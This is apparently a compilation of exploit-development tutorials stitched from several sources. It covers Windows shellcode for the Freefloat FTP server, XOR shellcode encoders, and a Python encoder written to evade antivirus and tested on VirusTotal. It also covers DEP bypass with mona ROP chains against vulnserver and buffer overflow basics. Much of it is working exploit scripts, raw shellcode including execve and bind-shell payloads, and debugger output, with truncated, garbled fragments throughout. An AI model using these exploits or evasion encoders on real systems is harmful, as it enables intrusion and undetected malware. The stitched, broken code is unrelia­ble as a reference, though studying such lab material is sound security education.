"\x8B\xC4" => MOV EAX,ESP | Put a pointer to the ASCII string in EAX
"\xBB\xED\x2A\x86\x7C" => MOV EBX,7C862AED | Move the pointer to WinExec() into EBX
This is a pretty good try but it won't work. Lets see what happens when we execute these
instructions in the debugger.
Its pretty close but we can see that when WinExec is called lpCmdLine doesn't know where our
ASCII command ends so it appends a ton of data to "calc.exe". We will need to terminate the
ASCII string with null-bytes.
We need "calc.exe" + "\x00"'s but we know that null-bytes are badcharacters however we can
easily xor a
register (which will then contain 4 null-bytes) and push it to the stack just before we push
“calc.exe”.
"\x50" => PUSH EAX | Push EAX to have null-byte padding for "calc.exe"
"\x68\x2E\x65\x78\x65" => PUSH ".exe" \ Push The ASCII string to the stack
"\x68\x63\x61\x6C\x63" => PUSH "calc" /
"\x8B\xC4" => MOV EAX,ESP | Put a pointer to the ASCII string in EAX
"\x50" => PUSH EAX | Push the pointer to lpCmdLine to the stack
"\xBB\xED\x2A\x86\x7C" => MOV EBX,7C862AED | Move the pointer to WinExec() into EBX
That should do the trick! We can see from the screenshots below that the parameters are now
displayed correctly. If you execute this code you will see calculator opening up.
#!/usr/bin/python
#----------------------------------------------------------------------------------#
# Software: http://www.freefloat.com/software/freefloatftpserver.zip #
#----------------------------------------------------------------------------------#
import socket
import sys
#----------------------------------------------------------------------------------#
# (*) WinExec #
# #
# ); #
# #
#----------------------------------------------------------------------------------#
WinExec = (
"\x6A\x01" # PUSH 1
#----------------------------------------------------------------------------------#
# Badchars: \x00\x0A\x0D #
#----------------------------------------------------------------------------------#
buffer = "\x90"*20 + WinExec
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.recv(1024)
s.send('QUIT\r\n')
s.close
(2) MessageBoxA
Before we do anything lets see what the MessageBoxA function looks like and what
parameters we need to feed it. You can find that information on MSDN.
MessageBoxA: MSDN
Structure: Parameters:
Lets start with our pointer to MessageBoxA this time we need to let arwin look in user32.dll.
Good, lets craft both our ASCII strings just like before. I have cheated a bit to make sure that
they are both 4-byte aligned but I encourage you to play around with it and create your own
caption and text.
Split Text into groups of 4 characters: Split Text into groups of 4 characters:
"the "
"box!"
Reverse the order of the character groups: Reverse the order of the character groups:
"b33f" "box!"
"the "
"Pop "
Look on google for a ASCII to hex converter Look on google for a ASCII to hex converter
and convert each character while maintaining and convert each character while
maintaining
the order: the order:
"\x62\x33\x33\x66" "\x62\x6F\x78\x21"
"\x74\x68\x65\x20"
"\x50\x6F\x70\x20"
To write these values to the stack simply add To write these values to the stack simply
add
The two other parameters that remain, hWnd and uType, need to be set to 0x00000000 which
is convenient since we will need to xor a register to pad our ASCII strings in any case. We can
then use that register to push null-bytes to the stack for these parameters as well.
This is the shellcode I came up with (but again, other variations are definitely possible).
"\x50" => PUSH EAX | Push EAX to have null-byte padding for "b33f"
"\x68\x62\x33\x33\x66" => PUSH "b33f" | Push The ASCII string to the stack
"\x50" => PUSH EAX | Push EAX to have null-byte padding for "Pop the box!"
"\x68\x74\x68\x65\x20" => PUSH "the " | Push The ASCII string to the stack
Like taking candy from a CPU hehe. In the screenshot below you can see the opcode in the
debugger and confirm that the parameters are displayed correctly.
#!/usr/bin/python
#----------------------------------------------------------------------------------#
# Software: http://www.freefloat.com/software/freefloatftpserver.zip #
#----------------------------------------------------------------------------------#
# This exploit was created for Part 6 of my Exploit Development tutorial #
# series - http://www.fuzzysecurity.com/tutorials/expDev/6.html #
#----------------------------------------------------------------------------------#
import socket
import sys
#----------------------------------------------------------------------------------#
# (*) WinExec #
# #
# ); #
# #
#----------------------------------------------------------------------------------#
WinExec = (
"\x6A\x01" # PUSH 1
#----------------------------------------------------------------------------------#
# (*) MessageBoxA #
# #
# ); #
# #
#----------------------------------------------------------------------------------#
MessageBoxA = (
#----------------------------------------------------------------------------------#
# Badchars: \x00\x0A\x0D #
#----------------------------------------------------------------------------------#
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.recv(1024)
s.send('QUIT\r\n')
s.close
http://www.fuzzysecurity.com/tutorials/expDev/6.html
https://www.linkedin.com/pulse/shellcode-creation-binary-execution-through-execve-
andrade-filho/
https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/
If you are not familiar, you use a shellcode encoder/decoder to hide the shellcode from AV
signature detection.
First, you place the encoded shellcode inside of the decoder application, and then the
application proceeds to decode the shellcode. Once the decoding is complete, the decoder
stub jumps to the shellcode, and it executes it.
While the shellcode is now harder to detect with signature detection, note that the decoder
stub itself could be detected.
XOR Encoding/Decoding
If you are unfamiliar with the XOR operator, it performs an exclusive OR.
• A xor B = 0
• A xor NOT B = 1
• NOT A xor B = 1
In this case, we will use a property of XOR that makes it easily reversible.
• (A xor B) xor B = A
This means that we encode our original shellcode byte (A) with the encoding byte (B). Then,
during the decoder process, we just need to XOR the encoded byte with the encoder byte (B),
to get the original shellcode byte (A).
Here is a great image from mutti that breaks down the process.
To perform the encoding and decoding process, you do the following four steps (via SLAE.
3. Write a decoder stub that will XOR the encoded shellcode bytes with 0xAA (thereby
recovering the original shellcode)
4. Pass control from the decoder stub to the decoded shellcode
First, I'll start by just sharing my final application code. It is very well commented, but I'll also
explain it a bit further below.
As you can see, it uses the same JMP-CALL-POP technique as my Hello World shellcode.
The xor operation is fairly straightforward, and then the application loops through the decode
process until it reaches the “marker”.
I used a marker of 0xAA to note the end of the payload. The application will exit before it
attempts to execute this null-byte, and it isn’t an actual null in our compiled shellcode, since
we’ve encoded the byte.
; Filename: xor_decoder_marker.nasm
; Website: https://www.doyler.net
global _start
section .text
_start:
decoder:
; Move the pointer to the encoded Shellcode into ESI off of the stack
pop esi
decode:
; XOR the byte pointed to by ESI by 0xAA - this was the value chosen during encoding, but
can be modified
; This is utilized to mark the end of the shellcode, so that a length variable is not needed
jz Shellcode
inc esi
call_decoder:
call decoder
Shellcode: db
0x9b,0x6a,0xfa,0xc2,0x85,0x85,0xd9,0xc2,0xc2,0x85,0xc8,0xc3,0xc4,0x23,0x49,0xfa,0x23,0x48
,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a,0xaa
Next, I used the one-liner to extract the shellcode, add it to my wrapper, and then compiled it.
"\xeb\x09\x5e\x80\x36\xaa\x74\x08\x46\xeb\xf8\xe8\xf2\xff\xff\xff\x9b\x6a\xfa\xc2\x85\x8
5\xd9\xc2\xc2\x85\xc8\xc3\xc4\x23\x49\xfa\x23\x48\xf9\x23\x4b\x1a\xa1\x67\x2a\xaa"
doyler@slae:~/slae/module2-7$ vi shellcode.c
Finally, I executed the application to make sure that it worked. In this case, I’m just reusing
Vivek’s execve (/bin/sh) shellcode from an earlier chapter.
doyler@slae:~/slae/module2-7$ ./shellcode
Shellcode Length: 42
$ exit
Tracing Execution
I also used GDB to trace the program’s execution, and watch the decoder at work.
Breakpoint 1 at 0x80483e8
(gdb) r
$1 = 0x804a040
Breakpoint 2 at 0x804a040
(gdb) disassemble
(gdb) c
Continuing.
Shellcode Length: 42
(gdb) disassemble
0x804a050 <code+16>: 0x9b 0x6a 0xfa 0xc2 0x85 0x85 0xd9 0xc2
0x804a058 <code+24>: 0xc2 0x85 0xc8 0xc3 0xc4 0x23 0x49 0xfa
0x804a060 <code+32>: 0x23 0x48 0xf9 0x23 0x4b 0x1a 0xa1 0x67
0x804a068 <code+40>: 0x2a 0xaa 0x00 0x00 0x00 0x00 0x00 0x00
0x804a070 <dtor_idx.6161>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
#include<stdio.h>
#include<string.h>
"\xeb\x09\x5e\x80\x36\xaa\x74\x08\x46\xeb\xf8\xe8\xf2\xff\xff\xff\x9b\x6a\xfa\xc2\x85\x8
5\xd9\xc2\xc2\x85\xc8\xc3\xc4\x23\x49\xfa\x23\x48\xf9\x23\x4b\x1a\xa1\x67\x2a\xaa";
main()
{
ret();
After stepping a few times, we can see that the decoder is doing its job, and the original
shellcode is starting to return.
(gdb) stepi
0x0804a046 in code ()
Finally, after a few more loops, the shellcode matches our un-encoded version!
(gdb)
0x0804a046 in code ()
Breakpoint 3 at 0x804a050
(gdb) c
Continuing.
; Filename: execve-stack.nasm
; Website: http://securitytube.net
; Training: http://securitytube-training.com
; Purpose:
global _start
section .text
_start:
push eax
push 0x68732f2f
push 0x6e69622f
push eax
push ebx
mov ecx, esp
mov al, 11
int 0x80
(gdb) exit
(gdb) quit
Quit anyway? (y or n) y
This encoder was pretty fun, and definitely lowered the detection rate on my execve payload.
You can find the code, and any updates, in my GitHub repository.
I apologize for my naming conventions being all over the place. I’ve been switching between
underscores and dashes almost every exercise. This is something that I’d love to clean up in
the future, but feel free to submit a pull request.
I was going to include a NOT encoder in this post as well. That said, after brushing up on my
bitwise operations, I realized that NOT is the same as (and actually slower than) XOR 0xFF.
The unencoded shellcode is split into 2 byte chunks, and for each chunk, a byte is generated to
XOR them with. Once a valid byte has been found, it is prepended to the chunk and then both
bytes are XORd using it.
In my previous posts as part of the SLAE assignments, I have explained the code in sequential
chunks. As the decoder uses a number of jumps and does not have a linear execution pattern,
see first the final code below:
global _start
section .text
_start:
decoder:
pop esi ; $esi: shellcode
decode:
mov bh, bl
mov al, dl
xor al, bl
jz short shellcode
xor ax, bx
; correct offsets.
inc ecx
call_decoder:
call decoder
The initial code that will be executed is found under the _start label. As has been seen in the
previous SLAE posts, it first XORs the registers that need to be cleared with themselves, to
ensure they are filled with 0:
After the registers have been cleared, the value 0x45 is stored in $dl. This value is used as an
end-of-file (EOF) delimiter. The reason this is required, is because when we process the
shellcode later in the program, we need to know at which point to stop processing it;
otherwise it would loop indefinitely:
After setting up the EOF delimiter, execution is passed to the instruction following
the call_decoder label:
This instantly calls decoder, which results in the address of shellcode being pushed on to the
stack.
When using the call instruction, the address of the next instruction is pushed on to the stack so
the program knows where to return execution to once the function has finished executing.
call decoder
The decoder function does not do much other than pop the address of the shellcode off the
stack and into $esi and then load the same address into $edi:
After running decoder, execution drops into the decode function; which is the main loop of the
decoder.
As the encoded payload is split into chunks of 3 bytes, which start with the byte used to XOR
the subsequent word, it first needs to create a word built from the XOR byte.
The combination of $edi + $ecx will always point to the start of the next chunk that needs to
be processed. Loading the byte at the address of these two register summed together will give
us the XOR byte:
mov bh, bl
Before continuing, the decoder now needs to verify that the current byte that is being
processed is not the EOF delimiter.
To do this, what we believe to be the XOR byte is moved into $al and is then XORd with the
current byte that was just moved into $bl.
If the zero flag is set following this operation, it means the two bytes matched, and we have
finished decoding the payload. In this scenario, a jump is made to the shellcode label, where
the payload will then be executed:
mov al, dl
xor al, bl
jz short shellcode
If the jump wasn’t taken, then we have another chunk to process. As a word has been built in
the $bx register containing the XOR bytes, the word starting at the next byte after the current
pointer is loaded into $ax and then XORd with $bx:
xor ax, bx
As the XOR byte that was prepended to the current chunk does not belong to the decoded
payload, it now needs to be removed. To do this, we move the decoded word in $ax to the
address pointed to by $edi (i.e. where the XOR byte currently resides).
Now that the chunk has been successfully decoded and the XOR byte has been overwritten,
the next chunk can be processed.
As mentioned when XORing the current word, the position of the current chunk is determined
by combining $edi and $ecx. The reason for this is due to an odd number of bytes being
contained within each chunk and the shifting that occurs.
This means, every time a chunk is processed, $edi alone would fall one place behind where the
start of the next chunk is. To work around this, $ecx is incremented by 1 each time a chunk is
processed, and as a result allows the decoder to keep track of where the next chunk is located.
With this in mind, the final step of the decode loop is to increment $ecx, move $edi forward by
2 bytes (to place it at the byte after the word that was just decoded) and then jump
to decode once more to process the next chunk.
Rather than manually selecting a XOR byte for each chunk, a valid EOF delimiter byte and then
processing each word in the unencoded shellcode - I have created a small Python script which
will automate all these tasks.
When selecting the XOR byte to use for each chunk, it will randomise the order in which it
checks the 254 byte range, meaning that encoding the same payload twice will likely not
produce the same output twice.
import random
import struct
import sys
decoder_stub = '\x31\xc0\x31\xdb\x31\xc9\x31\xd2'
decoder_stub += '\xb2\x45\xeb\x1f\x5e\x8d\x3e\x8a'
decoder_stub += '\x1c\x0f\x88\xdf\x88\xd0\x30\xd8'
decoder_stub += '\x74\x16\x66\x8b\x44\x0f\x01\x66'
decoder_stub += '\x31\xd8\x66\x89\x07\x41\x8d\x7f'
decoder_stub += '\x02\xeb\xe4\xe8\xdc\xff\xff\xff'
matched_a_byte = False
# Check if the potential XOR byte matches any of the bad chars.
for byte in bad_chars:
if i == int(byte.encode('hex'), 16):
matched_a_byte = True
break
if i == int(byte.encode('hex'), 16):
matched_a_byte = True
break
matched_a_byte = True
break
if matched_a_byte:
break
if not matched_a_byte:
return i
if len(sys.argv) < 2:
exit(1)
bad_chars = '\x0a\x00\x0d'
if len(sys.argv) > 2:
encoded = []
chunk_no = 0
# Issue a warning if any of the bad chars are found within the decoder itself.
stub_has_bad_char = False
if char == byte:
stub_has_bad_char = True
break
if stub_has_bad_char:
break
if stub_has_bad_char:
print '\033[93m[!]\033[00m One or more bad chars were found in the decoder stub\n'
# Loop through the shellcode in 2 byte chunks and find a byte to XOR them
# with, each time prepending the XOR byte to the encoded chunk.
chunk_no += 1
xor_byte = 0
chunk = shellcode[0:2]
xor_byte = find_valid_xor_byte(chunk, bad_chars)
if xor_byte == 0:
exit(2)
encoded.append(struct.pack('B', xor_byte))
if i < len(chunk):
else:
encoded.append(struct.pack('B', xor_byte))
shellcode = shellcode[2::]
# Find a byte that does not appear in the decoder stub or the encoded
if xor_byte == 0:
exit(3)
encoded.append(struct.pack('B', xor_byte))
# Join the decoder and encoded payload together and output to screen.
print final_shellcode
Testing The Encoder
To test the encoder, I used an execve shellcode, which will spawn a /bin/sh shell:
$ python xorfuscator.py
'\xeb\x1a\x5e\x31\xdb\x88\x5e\x07\x89\x76\x08\x89\x5e\x0c\x8d\x1e\x8d\x4e\x08\x8d\x5
6\x0c\x31\xc0\xb0\x0b\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x4
2\x42\x42\x43\x43\x43\x43'
\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb2\x8c\xeb\x1f\x5e\x8d\x3e\x8a\x1c\x0f\x88\xdf\x88\x
d0\x30\xd8\x74\x16\x66\x8b\x44\x0f\x01\x66\x31\xd8\x66\x89\x07\x41\x8d\x7f\x02\xeb\x
e4\xe8\xdc\xff\xff\xff\x85\x6e\x9f\x12\x4c\x23\x71\xaa\xf9\xb5\xeb\xb2\x25\xac\x53\x76\x
7e\xff\xd3\x8d\xdf\x4c\xc1\x52\x7f\xf2\x31\x3b\x33\xb6\xad\xfb\xa1\x1a\x2b\xda\xf2\x42\
xf9\x52\x9f\xd2\x99\x71\x78\x1c\xe3\xe3\x44\xbb\x6b\x78\x1a\x11\xe5\x8b\xca\x32\x41\x
5a\xe8\xa9\xaa\x31\x73\x73\xe6\xa4\xa5\x37\x74\x74\x4d\x0e\x4d\x8c
I then placed this shellcode into the same C program that I have used in the other SLAE posts:
#include <stdio.h>
#include <string.h>
int main(void)
s();
return 0;
$ whoami
rastating
After finishing coding the encoder and decoder, I was curious to see how anti-viruses would
respond to it.
\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\
x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\
x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x6
8\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
I then placed this shellcode into the C file used to test the encoder initially, compiled it and
uploaded it to VirusTotal. The executable was successfully identified by Avast, ClamAV and
AVG as being dangerous:
$ python xorfuscator.py
'\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00
\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\
x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x6
8\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'
\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb2\xa4\xeb\x1f\x5e\x8d\x3e\x8a\x1c\x0f\x88\xdf\x88\x
d0\x30\xd8\x74\x16\x66\x8b\x44\x0f\x01\x66\x31\xd8\x66\x89\x07\x41\x8d\x7f\x02\xeb\x
e4\xe8\xdc\xff\xff\xff\x7d\x4c\xa6\x09\xfe\xea\xd8\x8b\x9b\x0c\x5f\x66\x30\x32\xb9\x07\x
e6\xb7\x0f\x69\xc2\xab\x2b\xf0\x3e\x60\x6c\xea\x82\xe8\x63\x63\x72\x68\x34\x02\xeb\xf
b\xba\xef\xbf\x66\xf4\x15\x9e\xbb\xdd\xe3\x73\xbe\xf3\xbb\x32\xfa\xeb\xef\x58\x20\x24\
x90\xe3\x85\x2e\x64\xe4\x27\x59\xe9\x3f\xee\x23\x6e\x63\xf0\x3a\x47\x2d\x78\x68\x30\x
a5\x66\xe6\x2f\x69\x10\x91\xfa\x92\xd5\x3e\x11\x4d\xf4\x9c\x9c\x16\x39\x74\xa0\xc9\xce
\xd2\x5b\x31\x5c\x0c\x0f\xfb\x72\x1a\xb6\x06\xbd\xd1\x1c\x51\xa4
After encoding it, I placed the encoded shellcode into the same C file again, compiled, and
uploaded to VirusTotal once more. As expected, no anti-virus applications were able to
successfully detect the file as being dangerous:
This test illustrates how effective using a custom encoding scheme can be when attempting to
evade AV systems.
https://rastating.github.io/creating-a-custom-shellcode-encoder/
https://github.com/rastating/slae
https://docs.pwntools.com/en/stable/encoders.html
https://medium.com/syscall59/writing-a-custom-shellcode-encoder-31816e767611
DEP Bypass
Data Execution Prevention (DEP) was introduced as a protection mechanism to make parts of
memory non-executable, due to which attacks that attempt to execute instructions on the
stack will lead to exceptions. But motivated cybersecurity researchers have found ways to
bypass it.
Though Windows have other protection mechanisms to protect the system against similar
attack scenarios, it’s good for a cybersecurity enthusiast to keep themselves updated about
various techniques that can be leveraged to bypass these protection mechanisms.
Pre-requisites:
Requirements:
• A vulnerable application
The easiest way to bypass DEP is using Return-Oriented Programming. It can also be used to
bypass code signing.
The main idea behind ROP is to get control of the stack to further chain together machine
instructions from the subroutines present in the memory.
These existing assembly code is referred to as gadgets, each ends with a return instruction
(RET) and then points to next gadget, hence the name ROP chains.
We can chain together the gadgets to develop our shellcode but that would take a lot of time
and effort, so the smart way is to either disable DEP in runtime or allocate some space in the
memory not protected by execution prevention wherein we can put our shellcode.
Since we are executing instructions already available in the system memory, the initial
requirement is to be familiar with the APIs in Windows that can be leveraged to bypass DEP.
The table below lists the APIs and their functionality that can be used to achieve this:
A ROP chain can be developed to use any of the above functions given it is available for the
Windows version of the victim machine.
Sounds complicated right? It’s not thanks to the authors of mona who have made life simpler
for the hackers and difficult for the developers.
Exploit Development
Though DEP is already enabled by default, but just to be sure let’s check that it’s on.
Navigate to: Control Panel -> System and Security -> System -> Advanced System Settings
Then choose “Turn on DEP for all programs and services except those I select” if not already
People with experience in stack based Buffer Overflow exploit development will be familiar of
these interim steps.
a.) Start the testing Windows machine, wherein we will debug the vulnerable application to
twerk and develop our fully functional exploit.
b.) Make sure the vulnerable application is installed and running properly.
c.) Ensure Immunity debugger is working properly and mona.py is present in the PyCommands
folder of Immunity Debugger Application.
Now that everything is up and running let’s move on to the fun part — the exploit
development process.
The application which we are using is called vulnserver, which as the name suggest is
vulnerable.
In vulnserver TRUN command has been found to be vulnerable to stack based buffer overflow,
which in layman’s terms means that the application will crash when an input string of long
length that the application can’t handle is sent through the TRUN command. To be a bit more
technical, since the application has no boundation on the length of input that it can receive, so
the memory space (buffer) and the EIP (instruction pointer) gets overwritten.
To verify this, let’s send a string of say 3000 from the attacker machine to the application to
ensure that it is vulnerable:
#!/usr/bin/python
import socket,sys
host=”192.168.2.135"
port=9999
On attaching the application to Immunity Debugger and running the same script we can see
that the EIP is overwritten with four (length of an instruction) 41s which is hex for A.
We aim to get control of the EIP and point it to a location where our shellcode resides.
For that we aim to the find the length of string (offset) after which the EIP is overwritten.
Run the following command in kali terminal to generate a random string of length 3000
/usr/share/metasploit-framework/tools/pattern_create.rb -l 3000
Now, instead of the AAAs that we were sending to crash the application, we are going to send
this random string of same length and find out the character being written in EIP.
We restart the application from Immunity Debugger (Debugger->Restart) and run the below
script from the attacker machine.
#!/usr/bin/python
import socket
server = ‘192.168.43.200’
sport = 9999
prefix =
‘Aa0Aa1Aa……………………Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv
9’
attack = prefix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print “Sending attack to TRUN . with length “, len(attack)
s.send((‘TRUN .’ + attack + ‘\r\n’))
print s.recv(1024)
s.send(‘EXIT\r\n’)
print s.recv(1024)
s.close()
The application will crash again but this time EIP will be overwritten with a part of the random
string that we sent from the attacker machine.
b.) Again we will use metasploit to figure out the exact offset.
Replace the text highlighted in yellow with whatever characters EIP was overwritten with.
The output will tell us the offset enabling us to write whatever we wish to in the EIP.
For vulnserver it came out to be 2006. This means that after 2006 characters the next four
characters overwrite the EIP.
Now the payload which we will send on to the victim will be similar to that of buffer overflow.
For example on sending the payload as mentioned above EIP will be overwritten with four
Bs(\x42) as seen below. The padding will ensure that payload length is 3000.
Now that we have control of EIP we point it to the address of whatever instruction that we
want to execute next. For a normal Buffer Overflow the EIP would have pointed to a JUMP
instruction that will further jump to our shellcode present in the stack giving us a shell back
from the victim system.
But with DEP turned on, whenever the exploit tries to execute some instruction in the stack an
access violation occurs, so the normal Buffer Overflow exploit is useless for now.
Though the whole ROP concept is sounds overwhelming at first, the actual execution process is
not difficult.
We just need to run the following command from the Immunity Debugger instruction bar.
We are going to use the python code for VirtualProtect() from rop_chains.txt and exploit.
But before moving on with our ready to use code let’s pause and try to understand what
exactly is happening.
VirtualProtect() will turn off DEP for a part of memory, so the code placed in that part of the
memory can execute
• IpAddress: Points to a region for which DEP has to be turned off, this will be the base
address of the shell code on stack.
• dwsize: Size of the region for which DEP has to be turned off
• IpflOldProtect: points to a variable that will receive the previous access protection
value
Now ROP gadgets will be used to develop the above mentioned arguments that
VirtualProtect() needs, set the values as required and execute the function.
Let’s have a look at the ROP function generated by mona and try to understand how it works.
Lines 11,12,13,14 — dwSize of 0X201 was put in EAX and then transferred to EBX
Lines 15,16,17,18 — The Memory Protection constant 0x40 (read-write privileges) was put in
EAX then transferred to EDX for flNewProtect
Lines 19,20 — A pointer to a writable location has been set in ECX for IpflOldProtect
Lines 7,8 and 21,22 — ESI and EDI were populated for PUSHAD call to execute.
Lines 23,24,25 — A PUSHAD call is placed in EAX at the end, which will flush all the values that
were put in the register onto the stack.
Now that our code is ready, let’s try to execute some malicious code on the victim machine.
We place the malicious code along with the ROP chain in our exploit.
As seen in the code below, we first set calc to a malicious code that will open up a calculator.
Followed by the declaration of the ROP function generated by mona,Then we call the
create_rop_chain function, remove bad characters (\x00 for vulnserver) and store it in the
variable rop_chain.
Now that we have declared all the important stuff we just need to piece together our payload
and send it to the victim machine. Which we are doing in the following lines:
padding = ‘F’ * (3000–2006–16 — len(shellcode))
attack = prefix + rop_chain +nops + calc + padding
Our prefix is A*2006 so the EIP will be pointing to the ROP chain code. The ROP chain code will
execute the VirtualProtect() API, which in turn will allocate a memory location with DEP turned
off, where we will place our malicious code.
The we append our malicious code with nops and add padding at end to ensure that payload
length is 3000.
Then we send out the exploit and as evident from the image below the calculator will open up
in the victim windows machine.
So, our exploit was successfully able to bypass DEP and execute commands on the victim
machine.
What next? We can even get a shell back from the victim with the privileges of the vulnerable
application thereby compromising the confidentiality, integrity and availability of the system.
Tempting enough right? But that’s something for you to try. Just generate a shellcode using
the msfvenom replace the calculator code with freshly generate shellcode and exploit.
References
http://www.shogunlab.com/blog/2018/02/11/zdzg-windows-exploit-5.html
https://samsclass.info/127/proj/rop.htm
https://docs.google.com/document/d/1L1xCLzX0EFQoRrlp_MOm-
Jnkvb_2Qe2PFHqQ8Bt6oIU/edit#
https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-
with-rop-the-rubikstm-cube/
https://trailofbits.files.wordpress.com/2010/04/practical-rop.pdf
http://www.fuzzysecurity.com/tutorials/expDev/7.html
https://medium.com/cybersecurityservices/dep-bypass-using-rop-chains-garima-chopra-
e8b3361e50ce
If you’re reading this, there’s a likelihood you are already familiar with buffer overflow
exploitation (or atleast have heard of it). The gist of it is, certain programming SNAFU’s can
allow an attacker to send more input to a “buffer” than the expected length of that buffer can
handle. Let’s observe a classic format-string vulnerability:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
if (argc < 2)
exit(0);
strcpy(buffer, argv[1]);
printf("strcpy() executed...\n");
return 0;
}
Source: GeeksForGeeks.Org
In this example, if an attacker sends a large command-line argument as input to this program,
a buffer overflow condition can occur. I say, “can,” because in modern times certain compiler
flags need to be specified, otherwise the compiler (dependent on which one used, of course)
will likely implement some sort of stack smashing protection auto-magically. One way to carry
out a buffer overflow attack against this simple C program is to do the following:
In short, we are, “smashing the stack,” by overflowing the char buffer with 9 bytes of input
when it has specified an expected length of 5 bytes. The stack is a CPU memory structure used
for static memory allocation. It has a counter-part called the heap for dynamic memory
allocation, but that is a discussion for another day. Organization of data on the stack is
dependent on the endianness of a given CPU. On Intel processors, that endianness is last-in-
first-out, meaning the byte-order expected for computation must be sent with the last byte
first, and the first byte last. An important thing to note about the stack is that it grows from
higher memory to lower memory.
Memory ranges:
0xFFFFFFFF
Stack growth
0x00000000
To gain control of the stack, we need to send a memory address to the instruction pointer of
the CPU to execute code located at the desired memory address. If we were to overflow data
into the stack pointer of the CPU, we would require an address pointing to a “JMP ESP” (jump
to stack pointer) instruction to gain control of execution - thus exploiting the program.
So…what is all of this, and why do we care? If you’ve ever taken a computer class, you’ve
probably heard of the CPU referred to as the “brain” of the computer. TL;DR, if you hijack the
brain, the computer does what you want it to do. The information we just covered relating to
buffer overflows was relevant circa 1995, so we have some catching up to do.
If you’ve read my post on the Vulnerability Lifecycle, you should be familiar with some modern
exploitation mitigations. The ones we are mostly concerned with today are going to
be Address Space Layout Randomization (ASLR), and Data Execution Prevention (DEP). ASLR
has long been present in Microsoft Windows as early as XP SP2 for kernel modules (maybe
even earlier!). There are a few different forms and implementations of ASLR, but the most
significant roadblock in terms of exploitation is kernel ASLR (KASLR). Essentially, the memory
ranges for a given application will be randomized at start-up, making any static values in an
exploit irrelevant in terms of reliability.
The other roadblock to exploitation (that we will be defeating today) is DEP. DEP has been
implemented in Windows as early as XP SP2 and Server 2003 SP1. DEP marks a page of
memory as non-executable, rendering any code we overflow to it (as an example) irrelevant.
We can defeat DEP in certain circumstances via return-oriented-programming (ROP) to certain
Windows API’s. For this to work, we have to assemble the instructions we want executed in a
fashion like this:
0x1111111A SomeInstruction
0x1111111B retn
These are called “ROP gadgets.” Multiple gadgets make up a “chain.” The goal of a “rop chain”
is to organize instructions that will do what we want, then “return,” to the next gadget of our
“chain.” This is probably the most gentle explanation you will ever read about this subject, and
it gets FAR more complicated than my quick summary. A classic example of a rop gadget is the
trusted old “pop/pop/ret” technique used in SEH exploits.
0x1111111C retn
This gadget “pops” two words off of the stack, and returns execution control to the memory
located at the 2nd address (address of the next SEH). Let’s observe some interesting
happenings on VulnServer after enabling DEP.
#!/usr/bin/env python
"""
Date: 12/18/2019
"""
import socket
import struct
import sys
host = sys.argv[1]
port = int(sys.argv[2])
buffer += "A"*2003
buffer += "B"*4
buffer += "C"*(3500-2003-4)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.recv(1024)
s.send(buffer)
s.close()
print msg
As a quick side-note, a lot of people don’t know where the “/.:/” string comes from and just
blindly put it in their VulnServer exploits. Not all of the exploitable functions within VulnServer
will trigger on this string. This string came from fuzzing output from SPIKE written by Dave
Aitel. So if you’ve ever wondered what the string was, or where it came from, now you know.
In short, this exploit connects to VulnServer on port 9999, sends the TRUN command, triggers
a vulnerable function within VulnServer via the “/.:/” string, and overflows that function with a
large input of A’s, B’s, and C’s. The offset to the instruction pointer was calculated at offset
2003 bytes. This exploit should result in the hex characters “42424242” showing in EIP to
demonstrate we have some level of control over the program.
Excellent! We also have overflowed data showing in ESP. So all we have to do now is find a
JMP ESP instruction, and we should be good to go, right?
1. All of the addresses start with nullbytes - thereby null-terminating the rest of our
overflowed code
2. Even if we found an address that didn’t contain nullbytes, DEP will still block us.
So we know we have some limitations with null-bytes and DEP. Mona is an excellent exploit
development, and debugging script made by Corelan. It has many features (one we’ve seen
already with finding addresses containing JMP ESP opcodes). The one we will be focusing on
right now is the “!mona rop” command. There are a lot of handy features with this command.
